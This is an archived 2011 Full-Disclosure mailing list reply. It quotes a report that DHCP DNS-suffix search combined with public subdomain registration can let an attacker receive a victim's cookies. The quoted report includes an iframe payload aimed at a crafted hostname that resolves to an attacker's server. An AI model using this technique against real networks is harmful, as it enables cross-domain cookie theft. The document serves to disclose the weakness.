lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20110513113450.GB2720@DataIX.net> Date: Fri, 13 May 2011 07:34:50 -0400 From: Jason Hellenthal <jhell@...aIX.net> To: yu xi4o <evil.xi4oyu@...il.com> Cc: full-disclosure@...ts.grok.org.uk Subject: Re: Dns-suffix may lead to cross-domain and other security problems yu, Are you related to MustntLive ? On Fri, May 13, 2011 at 12:07:37PM +0800, yu xi4o wrote: > We all know that dhcpd can set the dns suffix for its clients. For example , > If we set the dns suffix as "test.com". While doing the domain name > resolution such as www.xxx.com , all the client using this dhcp server will > try the following order. > > 1. System tries to look up www.xxx.com if the dns find a IP addr , the > client will go on use this ip. > 2. Otherwise , the system will automatically add the dns suffix to have > another try(This is partly true cos win7 only add dns suffix to the dns > name doesn't contain a '.' ). This time will be www.xxx.com.test.com .If > the dns return the found addr, program will happily use this result as its > right answer .This did bring some convenient, but may lead to some problem, > for example cross-domain. > > Scenario ??? > 1.Company A.COM provide secondary domain registation for their customers ( > eg. free blog system) .People can register any username they want, from > example test . Then his space will be test.A.com. This works fine. > > 2.Company's internal network using a dhcp server which automatically adds an > A.COM dns suffix to their clients. > > An attack wanna gather some employees' gmail account. He then can easily > register a username like hack.www.google.com then the full domain name will > be hack.www.google.com.A.com > > > When A.com 's employees browser the web site contains a iframe such as > <iframe src="https://hack.www.google.com/accounts" >fuck it up</iframe> > > Employees's system will > 1. try to resolve hack.www.google.com then get a false answer(NX Domain). > 2.then try hack.www.google.com.A.com will get attacker's host IP addr.!!! > > But the browser doesn't know this & will happily send google's cookies to > the attacker's web server. > > Success on windows XP /Linux Ubuntu 11.04 IE FF Chrome~:) Failed on win7 > cos its only add dns suffix to the dnsname doesn't contain a '.' > > GAME OVER!!! > > Use your brains and think more potential attack vectors!! > > Find more vuls at http://www.wooyun.org/bugs/wooyun-2010-02113 > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- Regards, (jhell) Jason Hellenthal _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists